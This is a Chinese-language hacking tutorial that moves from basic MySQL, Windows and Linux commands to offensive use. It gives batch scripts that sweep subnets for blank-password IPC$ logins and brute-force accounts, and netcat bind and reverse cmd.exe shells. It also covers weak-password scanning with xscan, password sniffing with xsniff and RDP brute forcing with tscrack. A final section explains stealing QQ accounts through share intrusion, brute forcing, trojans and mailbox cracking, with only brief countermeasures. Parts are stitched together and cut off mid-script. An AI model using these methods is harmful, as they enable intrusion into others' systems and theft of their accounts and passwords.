增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
show databases;
显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql;
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (字段设定列表); 建表
drop database 库名;
drop table 表名; 删库和删表
delete from 表名; 将表中记录清空
select * from 表名; 显示表中的记录
mysqldump --opt schoolschool.bbb
备份数据库:(命令在DOS的\mysql\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
win2003系统下新增命令(实用部份):
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字
设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时)
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM
要终止的进程的进程名,/F 强制终止进程,/T
终止指定的进程及他所启动的子进程。
tasklist
显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC
显示出每个进程对应的服务,无参数时就只列出当前的进程。
#6 六:
Linux系统下基本命令: 要区分大小写
uname 显示版本信息(同win2K的 ver)
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
pwd 查询当前所在的目录位置
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
cat 文件名 查看文件内容
cat abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
chmod 设定档案或目录的存取权限
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期
、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改密码
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通常用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某服务器(同win2K)
附:批处理命令与变量
1:for命令及变量 基本格式:
FOR /参数 %variable IN (set) DO command [command_parameters]
%variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i
,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的之一个值,同理:%2—%9指输入的第2-9个值;例:net
use \ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
(set):指定一个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1
-1 254),{ “(1 1
254)”之一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }
command:指定对第个文件执行的命令,如:net
use命令;如要执行多个命令时,命令这间加: 来隔开
command_parameters:为特定命令指定参数或命令行开关
IN (set):指在(set)中取值;DO command :指执行command
参数:/L 指用增量形式{ (set)为增量形式时 };/F
指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:pass.txt)时 }。
用法举例:
@echo off
echo 用法格式:test.bat *.*.* test.txt
for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \%1.%%G
/user:***istrator | find "命令成功完成" test.txt
存为test.bat
说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的
%1;%%G 为变量(ip的最后一位); 用来隔开echo 和net use 这二个命令;|
指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G
为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:user.dic) DO *** b.exe %1 %%i D:pass.dic 200
存为:ok.exe
说明:输入一个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。
#7 七:
2:if命令及变量 基本格式:
IF [not] errorlevel 数字 命令语句
如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
例:IF errorlevel 0 命令 指程序执行后返回
的值为0时,就值行后面的命令;IF not errorlevel 1
命令指程序执行最后返回的值不等于1,就执行后面的命令。
0 指发现并成功执行(真);1 指没有发现、没执行(假)。
IF [not] 字符串1==字符串2 命令语句
如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。
例:“if "%2%"=="4" goto
start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
例:“if not nc.exe goto
end”指:如果没有发现nc.exe文件就跳到":end"标签处。
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not]
字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else
命令语句 加上:else
命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。
当有del命令时需把del命令全部内容用括起来,因为del命令要单独一行时才能执行,用上后就等于是单独一行了;例如:“if
exist test.txt. else echo test.txt.missing ”,注意命令中的“.”
(二)系统外部命令(均需下载相关工具):
1、瑞士军刀:nc.exe
参数说明:
-h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行〔危险〕
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p[空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
基本用法:
nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
nc -l -p 80 开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe
绑定remote主机的cmdshell在remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354
梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
高级用法:
nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
nc -L -p 80 c:log.txt
作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
nc -L -p 80 存放文件的路径及名称 传送文件到对方主机
备 注:
| 管道命令
重定向命令。“ d:log.txt
意思是:后台执行dir,并把结果存在d:log.txt中
与的区别 ""指:覆盖;""指:保存到(添加到)。
如:@dir c:winnt d:log.txt和@dir c:winnt
d:log.txt二个命令分别执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果,是因为第二次的结果把之一次的覆盖了。
#8 八:
2、扫锚工具:xscan.exe
基本格式
x
scan -host [-] [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息
xscan -file [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
检测项目
-active 检测主机是否存活
-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)
-port 检测常用服务的端口状态
-ftp 检测FTP弱口令
-pub 检测FTP服务匿名用户写权限
-pop3 检测POP3-Server弱口令
- *** tp 检测 *** TP-Server漏洞
-sql 检测SQL-Server弱口令
- *** b 检测NT-Server弱口令
-iis 检测IIS编码/解码漏洞
-cgi 检测CGI漏洞
-nasl 加载Nessus攻击脚本
-all 检测以上所有项目
其它选项
-i 适配器编号 设置 *** 适配器, 可通过"-l"参数获取
-l 显示所有 *** 适配器
-v 显示详细扫描进度
-p 跳过没有响应的主机
-o 跳过没有检测到开放端口的主机
-t 并发线程数量,并发主机数量 指定更大并发线程数量和并发主机数量,
默认数量为100,10
-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p
检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
xscan -host 192.168.1.1-192.168.255.255 -port - *** b -t 150 -o
检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,更大并发线程数量为150,跳过没有检测到开放端口的主机
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o
检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,更大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机
#9 九:
3、命令行方式嗅探器: xsniff.exe
可捕获局域网内FTP/ *** TP/POP3/HTTP协议密码
参数说明
-tcp 输出TCP数据报
-udp 输出UDP数据报
-icmp 输出ICMP数据报
-pass 过滤密码信息
-hide 后台运行
-host 解析主机名
-addr IP地址 过滤IP地址
-port 端口 过滤端口
-log 文件名 将输出保存到文件
-asc 以ASCII形式输出
-hex 以16进制形式输出
用法示例
xsniff.exe -pass -hide -log pass.log
后台运行嗅探密码并将密码信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1
嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出
4、终端服务密码破解: tscrack.exe
参数说明
-h 显示使用帮助
-v 显示版本信息
-s 在屏幕上打出解密能力
-b 密码错误时发出的声音
-t 同是发出多个连接(多线程)
-N Prevent System Log entries on targeted server
-U 卸载移除
tscrack组件
-f 使用-f后面的密码
-F 间隔时间(频率)
-l 使用-l后面的用户名
-w 使用-w后面的密码字典
-p 使用-p后面的密码
-D 登录主页面
用法示例
tscrack 192.168.0.1 -l ***istrator -w pass.dic
远程用密码字典文件暴破主机的***istrator的登陆密码
tscrack 192.168.0.1 -l ***istrator -p 123456
用密码123456远程登陆192.168.0.1的***istrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存为3389.bat)
(假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
@if not exist tsc
96243464942654怎么破译
一、本地破解
*** :
这个办法的首要条件是你所在的机器开过你想要的 *** 号,这又分两种情况,一是你所在的机器真的曾经开过这个号码,二是通过共享入侵得到你想要的号码的整个目录,把它拷贝到你的OICQ的目录下,启动OICQ你就能在号码选择下拉列表中看到这个号码了。共享入侵请参看本站黑客教程之对共享主机的简单入侵 ,网上硬盘共享最多的就是网吧和公司,而前者的硬盘里存有大量的 *** 号码,只要你能进去且它的OICQ目录或它所在的分区是共享的话,自己慢慢挑吧。但是网上的IP多如牛毛,如何知道这个IP是网吧的呢,站长推荐本站聊天工具中的一个工具:WhoCQII FULL版,这个东东能让你探查一段指定IP地址里所开的OICQ,如果有哪一个IP打开了一串 *** ,十有八九这就是网吧了,这时候你可以用本站 *** 监控中的飘叶网际隧道1.0 ,这个工具是专门用来入侵 *** 共享硬盘的,使用它你必须安装Microsoft *** 用户,使你的桌面上有一个网上邻居,且必须安装NETBEUI等协议,即可接入对等网。输入它的IP,再输入你所猜测的共享名,也就是它所共享分区或目录的名字,如果对了的话,恭喜你,你进去了,选择你要的号码吧!
下一步就是破解了,破解密码最常用的办法是穷举,也就是暴力破解了。你可以从本站密码破解下一个暴力破解器。我推荐 Pw Check 1.02 ,这个软件虽说是破解共享软件注册码的,其实就是一个暴力破解器,使用 *** :首先在按键一和按键二都选择Enter,保存设置,然后读取一个字典,打开OICQ,选择你想破解的号码,随意输入一个密码,选登录,它会弹出一个对话框“输入密码与上次成功登录的密码不一致,是否到服务器验证”(除了你运气好得没话说,一次对了,这个对话框就不会出现^-^)选“否”,然后在“请再次输入登录密码”对话框的空白处按下*键,就开始破解了,再次按*键停止。停止后可以保存进度,以便下次可以继续进度,字典输入完后会自动停止。这个工具免费注册。破解密码要用到字典,还有网友来信问我什么是字典,你真是!@#$%,字典是你所猜测密码的组合,格式通常为DIC,TXT,一行一个,破解器会逐行取出测试,直到密码正确和字典用完为止。这里你可以用本站字典工具中的万能钥匙 ,它是一个符合中国人习惯的字典生成机。生成的字典大小更好不要大于10Mb,要是字典过大可以用分割软件将其分成几个部分。否则容易死机!!!
对策:
从上面知道,破解密码通常是穷举。不要用简单的英文和纯数字作为密码,应该是大小写、数字、符号的混合,不要少于八位,这样的话密码就不容易被破了。再有就是网吧更好不要把重要的分区和文件夹共享出来,比如:C:\、OICQ、FOXMAIL......
二、在线破解
*** :
在线破解 *** 密码的工具叫OICQHACK,本站密码破解有这个工具和它的注册机,未注册前扫描模式与号码列表模式将被禁用。注册 *** 参看压缩包内readme,这里我就不赘述了。运行OICQHACK后界面如下:
From: [10001] To:[10009]
此栏为扫描的 OICQ 号码范围,选中 [V] Scan Mode 即可开启扫描模式进行多号码探测,缺省为单个号码探测模式.
注意:扫描模式之一轮密码是低速探测,因此会较慢之后将自动开启高速扫描智能跳过不存在的空号,探测速度更高可达每秒100次.
Uin File: [Uin.dic]
此栏填写OICQ号码列表文件路径以及文件名,号码列表文件格式请参照 uin.dic ,选中 [V] Uin File 即可开启号码文件列表模式,读取列表文件中OICQ号码进行密码探测.
Dict Path: [Password.dic]
此栏填写密码字典路径以及文件名,密码列表文件格式请参照 password.dic ,选中 [V] Password File 即可开启密码字典模式,进行常用密码探测,缺省为 Brute Force 暴力破解.
[V] 0123456789
[. .] abcdefghijklmnopqrstuvwxyz
[. .] ABCDEFGHIJKLMNOPQRSTUVWXYZ
[. .] .,:?!+-*/@$#%|\~`^_()[]{}
此处选取 Brute Force 密码范围.
Password Length: [3]
此处选取 Brute Force 密码长度.
注意:以下设置建议使用默认值.
Max Threads: [ 16 ]
更大并发连接线程数,与探测速度和超时错误率成正比,取值视机器性能而定.
Timeout: [ 32 ]
超时等待时间,单位秒,与超时错误率和探测速度成反比,取值视你的耐心而定.
SP: 既非扫描模式也非号码文件列表模式的单号码探测由于受到服务器登陆时间限制会很慢,只能达到每秒1次,因此应尽量将待测号码做成列表文件进行批量探测。在批量扫描探测加密码字典模式下适当选取线程超时值能提高效率,最快可高达每秒100次.
这个工具同样需要字典穷举!
对策:
同样是密码设定和长度的问题,密码够长,且是大小写、符号、数字的组合,你的密码就相对安全些!
三、另类破解
1、使用工具
*** :
本站聊天工具中有一个工具叫:OICQ密码瞬间破解器 V1.02 它能破解出本地各OICQ号码的最后一个使用密码,只要该号码曾经选择过“下次登陆不显示登陆框”参数。软件即可以在瞬间得到这个 *** 密码!
对策:
登录时不要选择“保存密码”
2、使用木马
*** :
在被害人的机器上运行木马的客户端,它就能自行记录每位登录者的OICQ号码和它的密码。有的木马能把结果发回你的信箱,如:Get Oicq Password,有的要你回到该机器查看记录文件,如:KillOicq0.1,oicqmima,Oicq密码记录器,OICQ 潜伏者单机版 Beta 1.2,蜘蛛OICQPass beta 1......以上工具都能在本站聊天工具找到。
对策:
防范当然是之一的,不要运行来历不明的软件(本站的除外,呵呵)Get Oicq Password木马的查杀工具叫KILLGOP,本站聊天工具中有。其他的木马可以试试Ctrl+Alt+Del查看进程,发现可疑的立即杀掉,还有的木马不会在进程栏里显示出来,这就关系到注册表了,请参看本站黑客教程中的几篇关于木马的文章。
3、使用邮箱
*** :
因为腾讯验证密码时要用到你的邮箱,它会把密码发回注册这个号码时所填的邮箱里。所以破解邮箱也不失为一个好办法。通常别人的个人资料里所填的邮箱就是他的验证邮箱。看中了他的号码吗,破掉他的邮箱密码吧。站长推荐的工具是密码破解中的Tetrp FTP/POP Passwd Trier,这是一个专门用于破解邮箱的工具,也是暴力破解,同样要用字典
0条大神的评论